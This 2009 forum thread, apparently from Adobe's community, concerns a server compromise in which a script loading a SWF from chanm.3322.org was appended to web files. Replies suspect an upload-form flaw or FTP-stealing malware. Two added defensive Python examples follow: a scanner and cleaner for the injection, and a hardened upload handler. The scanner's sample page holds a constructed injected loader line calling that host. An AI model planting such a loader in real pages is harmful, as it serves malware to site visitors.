July 2, 2009
Question

CFM <script> injection hack...


Our servers have been hacked and we're having trouble finding the point of entry for the trojan.

What we're seeing is essentially every web file (.htm(l),.cfm,.php,.js, etc) being appended with a script code trying to load a swf from "chanm.3322.org/flash/".

We've cleaned it up once and then restarted the server and it got infected again.

Is this familiar to anybody else here yet?  Any tips on cleaning this up??

Ugh, headache!

Thanks

Paul
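A defender's scan for the symptom Paul describes, as an added example that is not part of the original post. It walks a web root for the listed file types, reports every complete `<script>` element that mentions the host quoted above, flags files that mention the host without such an element (a `.js` file would carry the loader as plain script, not a tag) for manual review, and can strip the matched elements while keeping a `.bak` copy of each file it touches. The sample page is constructed, and since the thread does not give the loader's exact markup, the pattern matches any script element naming that host.

```python
"""Find (and optionally strip) an appended <script> loader across a web root.

Added example for this thread, not code from the original poster. Assumed:
the injected element is a complete <script>...</script> that mentions the
host quoted in the post; the sample page below is constructed.
"""
import re
import shutil
from pathlib import Path

WEB_EXTENSIONS = {".htm", ".html", ".cfm", ".php", ".js"}
INDICATOR_HOST = "chanm.3322.org"  # host quoted in the original post

# One whole <script> element (inline or src=) whose text mentions the host.
# Case-insensitive, spans lines, and lazy so adjacent injections stay separate.
INJECTED_SCRIPT = re.compile(
    r"<script\b(?:(?!</script>).)*?" + re.escape(INDICATOR_HOST)
    + r"(?:(?!</script>).)*?</script>",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample: a clean page plus the kind of loader the post describes.
CLEAN_PAGE = "<html><body><h1>Products</h1></body></html>\n"
CONSTRUCTED_INJECTION = (
    "<script>document.write('<embed src=\"http://chanm.3322.org/flash/x.swf\""
    " width=0 height=0></embed>')</script>"
)
SAMPLE_PAGE = CLEAN_PAGE + CONSTRUCTED_INJECTION


def find_injections(text):
    """Return every injected <script> element found in text."""
    return [m.group(0) for m in INJECTED_SCRIPT.finditer(text)]


def mentions_indicator(text):
    """True if the host appears anywhere; catches .js files with no <script> tag."""
    return INDICATOR_HOST.lower() in text.lower()


def clean_text(text):
    """Strip injected elements; return (cleaned text, number removed)."""
    cleaned, count = INJECTED_SCRIPT.subn("", text)
    if count:
        cleaned = cleaned.rstrip() + "\n"  # leave a single trailing newline
    return cleaned, count


def scan_tree(root):
    """Map relative path -> (element matches, host mentioned) for suspect files."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        # latin-1 round-trips every byte unchanged; the pattern is pure ASCII.
        text = path.read_text(encoding="latin-1")
        hits = len(find_injections(text))
        mentioned = mentions_indicator(text)
        if hits or mentioned:
            report[str(path.relative_to(root))] = (hits, mentioned)
    return report


def clean_tree(root):
    """Strip matched elements in place, keeping a .bak copy of each file touched.

    Files that mention the host without a matching element are left alone for
    manual review. Returns {relative path: elements removed}.
    """
    root = Path(root)
    fixed = {}
    for rel, (hits, _mentioned) in scan_tree(root).items():
        if not hits:
            continue
        path = root / rel
        shutil.copy2(path, path.with_name(path.name + ".bak"))
        cleaned, count = clean_text(path.read_text(encoding="latin-1"))
        path.write_text(cleaned, encoding="latin-1")
        fixed[rel] = count
    return fixed


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, (hits, mentioned) in sorted(scan_tree(target).items()):
        print(f"{rel}: {hits} injected element(s); host mentioned: {mentioned}")
```

Invoked with the web root as its argument it only reports; `clean_tree` is a separate call so the report can be reviewed first. Stripping the tags removes the symptom, not the cause: the re-infection after restart that Paul mentions means the entry point (the replies below discuss an upload form and stolen FTP credentials) still has to be found and closed, and a restore from a known-good backup is the safer cleanup where one exists.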

    4 replies

    Inspiring
    July 2, 2009

    If you are getting this kind of problem, then obviously your server-side security is insufficient:

    • If you are using a shared hosting service, then you are completely dependent upon the security (or lack thereof) that is maintained by the hosting service.  If your directories are not adequately protected, then some other person who has an account on the same box might be able to diddle with your files.

    • It isn't enough for you to simply FTP (or SFTP) your files up to the server, leaving their file-access permissions at a very convenient default value.  You need to know what user-ID your web server is logged on as (it might be "nobody" or it might be you!), and you need to protect all of the executable material, any images and reference-files and so on, so that they are read-only, or execute-only.  The ColdFusion application server needs to be able to access the scripts (that is to say, the auto-generated Java ...) but neither it nor the web-server should serve the files directly.  And neither of them should be able to modify or replace any of those files:  they should not have sufficient permissions to do so.

    If an image-upload succeeded in making such a file replacement, then there are any number of points at which such an action should have been rendered impossible ... and so, if they succeeded, "shame on you."

    1. Navigation outside of the target space for storing images should have been impossible.
    2. Use of ".." and other things in URLs or file-locations should have been impossible.
    3. Only the intended destination for the images should have been writeable, and symlinks should not have been honored.
    4. Modification (or disclosure) of the ColdFusion materials should have been impossible.

    How do I say this delicately...  if this happened, then the person(s) responsible should be fighting to keep their jobs in the face of "gross negligence" and "dereliction of duty." :-/

    They should, as my grandma would say, at least "have some 'splainin to do..."

    Ken_Ford_-_ACP-QFo4AB
    Inspiring
    July 2, 2009

    Looks like it may be an image upload form:

    http://www.coldfusionjedi.com/index.cfm/2009/6/30/Are-you-aware-of-the-MIMEFile-Upload-Security-Issue

    http://badwarebusters.org/main/itemview/5298

    http://www.cfexecute.com/post.cfm/spoofing-mime-types-with-coldfusion-and-cfhttp

    This should tell you how to secure the form:

    http://www.petefreitag.com/item/701.cfm

    Ken Ford
    Adobe Community Expert - Dreamweaver/ColdFusion
    Adobe Certified Expert - Dreamweaver CS4
    Adobe Certified Expert - ColdFusion 8
    Fordwebs, LLC
    http://www.fordwebs.com
    http://www.cfnoob.com
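The four points in the first reply (no navigation outside the image directory, no `..`, only the intended destination writable with symlinks refused, ColdFusion files untouchable) and the MIME-spoofing problem behind Ken's links, as one added example. It is not the thread's code and not ColdFusion; it assumes uploads go to a single dedicated directory that is the only writable location, that the server rather than the client chooses the stored name, and that the file type is taken from the leading bytes instead of the client's filename or Content-Type. The size limit and the sample requests are constructed.

```python
"""Image-upload handler for the four points in the first reply plus MIME sniffing.

Added example for this thread, not the poster's code and not ColdFusion.
Assumed: one dedicated upload directory is the only writable location, the
server picks the stored name, and the type comes from the bytes, never from
the client's name or Content-Type. Sample requests are constructed.
"""
import os
import secrets
import tempfile
from pathlib import Path

# Magic numbers of the only types accepted; the client's Content-Type is ignored.
SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_BYTES = 2 * 1024 * 1024  # constructed limit


class RejectedUpload(ValueError):
    """Raised when a request fails one of the checks."""


def sniff_image_type(data):
    """Return 'jpg', 'png' or 'gif' from the leading bytes, else None."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def check_client_name(name):
    """Points 1 and 2: no path components, no '..', no hidden or empty names.
    The client's name is only inspected; it never becomes part of the stored path."""
    if not name or name != os.path.basename(name) or "\\" in name:
        raise RejectedUpload("filename contains path components")
    if ".." in name or name.startswith("."):
        raise RejectedUpload("filename contains '..' or is hidden")


def choose_destination(upload_dir, kind):
    """Point 3: a random, server-chosen name inside the resolved upload dir."""
    base = Path(upload_dir).resolve()
    if not base.is_dir():
        raise RejectedUpload("upload directory is missing")
    dest = base / f"{secrets.token_hex(16)}.{kind}"
    if dest.resolve().parent != base:  # defence in depth; the name is ours
        raise RejectedUpload("destination escapes upload directory")
    return dest


def store_upload(upload_dir, client_name, client_mime, data):
    """Validate and store one upload; returns the stored Path. Point 4 follows
    from writing only into upload_dir, mode 0o644 (no execute bit), and an
    extension that can only ever be an image type."""
    check_client_name(client_name)
    if len(data) > MAX_BYTES:
        raise RejectedUpload("file too large")
    kind = sniff_image_type(data)
    if kind is None:
        raise RejectedUpload(f"content is not an image (client claimed {client_mime!r})")
    dest = choose_destination(upload_dir, kind)
    # O_EXCL: never overwrite an existing path (a symlink included);
    # O_NOFOLLOW where available: never write through a symlink.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(dest, flags, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return dest


# Constructed requests: one genuine GIF and three that must be rejected.
GENUINE_GIF = b"GIF89a\x01\x00\x01\x00" + b"\x00" * 24
REJECTED_REQUESTS = {
    "spoofed_mime": ("photo.gif", "image/gif", b"<cfset x = 1>"),
    "traversal": ("../../index.cfm", "image/png", GENUINE_GIF),
    "oversized": ("big.gif", "image/gif", GENUINE_GIF + b"\x00" * MAX_BYTES),
}


def run_demo():
    """Run the handler against the constructed requests; return the outcomes."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        stored = store_upload(tmp, "photo.gif", "image/gif", GENUINE_GIF)
        results["genuine"] = stored.parent == Path(tmp).resolve() and stored.suffix == ".gif"
        for label, (name, mime, data) in REJECTED_REQUESTS.items():
            try:
                store_upload(tmp, name, mime, data)
                results[label] = "accepted"
            except RejectedUpload as exc:
                results[label] = str(exc)
    return results


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print(f"{label}: {outcome}")
```

The spoofed request is the case the linked write-ups describe: a ColdFusion template sent with an image filename and an `image/gif` Content-Type. Deciding by the file's own bytes rejects it regardless of what the client claims, and the server-chosen name means no uploaded file can ever carry a `.cfm` extension or land outside the upload directory, which is what makes the first reply's point 4 hold even if another check were bypassed.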

    Participating Frequently
    July 2, 2009

    Please search the forums; this problem has been answered before (basically, one of the computers with FTP access is infected with Gumblar or some other FTP-stealing trojan).

    Mack

    Inspiring
    July 2, 2009

    Hi,

    Have you checked your server logs?